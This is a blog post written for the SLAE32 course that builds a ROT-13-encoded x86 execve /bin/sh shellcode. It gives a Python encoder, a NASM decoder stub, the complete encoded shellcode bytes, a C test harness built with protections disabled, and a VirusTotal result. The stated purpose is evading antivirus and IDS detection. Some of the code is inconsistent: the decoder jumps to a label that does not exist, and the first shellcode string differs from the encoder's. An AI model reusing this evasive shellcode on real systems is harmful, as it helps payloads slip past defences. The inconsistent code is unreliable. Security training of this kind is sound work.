ROT-13 Shellcode encoder - SLAE32 Fourth Exam Assignment
Introduction
Hello Everyone! This blog post is dedicated to Assignment 4 of the SLAE32 Exam, which is about creating Custom Shellcode encoder.
Assignment 4 - Custom Shellcode encoder
There are 2 main instructions provided to us in this assignment:
- Create a custom encoding scheme for your shellcode
- Create a working PoC with the execve-stack shellcode presented and execute.
Creating the execve ROT-13 Encoded shellcode
First of all, as presented in our task, we will use the execve-stack shellcode which is presented below.
"\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
Our shellcode is simple stack-based execve SYSCALL that executes /bin/sh
The reason for us to implement encoding scheme on our shellcode is in-order to make it harder for AV’s and IDS to match the new shellcode that we craft by making it obfuscated.
Encoding our shellcode
As for the XOR encoding method, it’s already populated throughout the shellcoding world and most AV’s and IDS’s are well aware of those encoding schemes.
I have decided to choose to encode my shellcode with the ROT-13 technique.
I have created rot13encoder.py in order to craft the encoded shellcode within the ROT-13 technique
the code is presented below:
#!/usr/bin/env python
# Filename: rot13encoder.py
# Author: Gal Nagli
shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
rot = 13
full = 256 - rot
encodedc = ""
encodednasm = []
for x in bytearray(shellcode):
if x < full:
encodedc += '\\x%02x' % (x + rot)
encodednasm.append('0x%02x' % (x + rot))
else:
encodedc += '\\x%02x' % (rot - 256 + x)
encodednasm.append('0x%02x' % (rot - 256 + x))
print "Encoded Representation for C file:\n%s\n" % encodedc
print "Encoded Representation for nasm file:\n%s\n" % ','.join(encodednasm)
Next, i will excecute the python script and i will get as output my encoded execve-stack shellcode with easily crafted representation for our decoder.nasm file and shellcode.c file.
python rot13encoder.py
Creating the decoder stub
Now, after crafting the encoded shellcode, i will create my decoder.nasm file.
Which will decode the shellcode and craft the “decoder stub” which will append right before our shellcode.
# Filename: decoder.nasm
# Author: Gal Nagli
global _start
section .text
_start:
jmp short call_shellcode
decoder:
pop esi ; pop the address of the shellcode in the ESI register
xor ecx, ecx ; zeroing out the ECX register
mov cl, 25 ; counter = 25 (length of the shellcode, number of loops)
decode:
cmp byte [esi], 0xD ; compare if it's possible to substract the value 13 from the byte
jl max_reached ; jump if less -> full_reached
sub byte [esi], 0xD ; substract the value 13
jmp short shellcode
full_reached:
xor edx, edx ; zeroing out the EDX register
mov dl, 0xD ; set the value 13 into the EDX register
sub dl, byte [esi] ; subtract 13 - byte value of the shellcode
xor ebx, ebx ; zeroing out the EBX register
mov bl, 0xff ; 0xff = 255 (making it two-staged to not encounter null-byte)
inc ebx ; = 256
sub bx, dx ; 256 - (13 - byte value of the shellcode)
mov byte [esi], bl ; move bl into the ESI register
shellcode:
inc esi ; move to the next byte
loop decode ; loop "decode"
jmp short EncodedShellcode
call_shellcode:
call decoder
EncodedShellcode: db 0x3e,0xcd,0x5d,0x75,0x3c,0x3c,0x80,0x75,0x75,0x3c,0x6f,0x76,0x7b,0x96,0xf0,0x5d,0x96,0xef,0x60,0x96,0xee,0xbd,0x18,0xda,0x8d
Now, i will compile the decoder.nasm file and i will recieve our shellcode with the decoderstub beforehand.
./compile.sh decoder
Now, i will insert the crafted shellcode into our shellcode.c program, as the following:
#include<stdio.h>
#include<string.h>
unsigned char shellcode[] = \
// Decoder Stub:
"\xeb\x24\x5e\x31\xc9\xb1\x19\x80\x3e\x0d\x7c\x05\x80\x2e\x0d\xeb\x10\x31\xd2\xb2\x0d\x2a\x16\x31\xdb\xb3\xff\x43\x66\x29\xd3\x88\x1e\x46\xe2\xe3\xeb\x05\xe8\xd7\xff\xff\xff"
// Encoded Shellcode:
"\x3e\xcd\x5d\x75\x3c\x3c\x80\x75\x75\x3c\x6f\x76\x7b\x96\xf0\x5d\x96\xef\x60\x96\xee\xbd\x18\xda\x8d";
main()
{
printf("Shellcode Length: %d\n", strlen(shellcode));
int (*ret)() = (int(*)())shellcode;
ret();
}
Creating the executeable
gcc shellcode.c -fno-stack-protector -z execstack -o rot13execve
./rot13execve
And that’s it! we have a running ROT-13 encoded /bin/sh shellcode.
Uploading our shellcode to virustotal:
Uploading the crafted ROT-13 encoded execve shellcode to VirusTotal returned the following:
Although it was kinda expected because i have used a public known encoding scheme, 17/75 detection ratio is good enough for me at this stage :-) Thank you very much for sticking around!
References
- ROT-13 technique - https://he.wikipedia.org/wiki/ROT13
Wrap-Up
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification
https://www.pentesteracademy.com/course?id=3
Student ID: SLAE - 1543
All the source code which i have used throughout the assignment is available here: https://github.com/NagliNagli/SLAE/tree/master/ROT13-Execve-Shellcode
Cheers, Gal.